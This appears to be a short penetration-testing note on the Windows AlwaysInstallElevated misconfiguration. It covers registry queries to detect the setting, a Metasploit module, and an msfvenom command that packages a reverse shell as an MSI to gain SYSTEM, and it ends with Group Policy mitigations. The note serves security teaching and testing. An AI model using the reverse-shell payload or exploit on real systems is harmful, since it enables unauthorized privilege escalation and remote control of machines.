Always Install Elevated

Always Install Elevated is a registry / GPO setting that allows non privileged accounts to install Windows Package Installer (MSI) files with SYSTEM permissions. Usually this is used in environments to reduce workload for Helpdesk staff for when users require software to be installed.

Command to query registry keys:

# Value 0x1 represents AlwaysInstallElevated as being enabled.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

WinPEAS can also be used to show this setting as being enabled.

Exploitation

Metasploit

Metasploit can be used to abuse this privilege.

use exploit/windows/local/always_install_elevated

Manual - msfvenom

msfvenom can be used to create a reverse shell disguised as a MSI file. When the file is executed / installed a reverse shell as SYSTEM will be executed.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f msi -o Application.msi

Manual install of the MSI file:

Manual MSI Install

Which returns a SYSTEM shell as shown below.

Mitigations

Ensure that the following Group Policy Objects are set to disabled:

• Computer Configuration\Administrative Templates\Windows Components\Windows Installer

• User Configuration\Administrative Templates\Windows Components\Windows Installer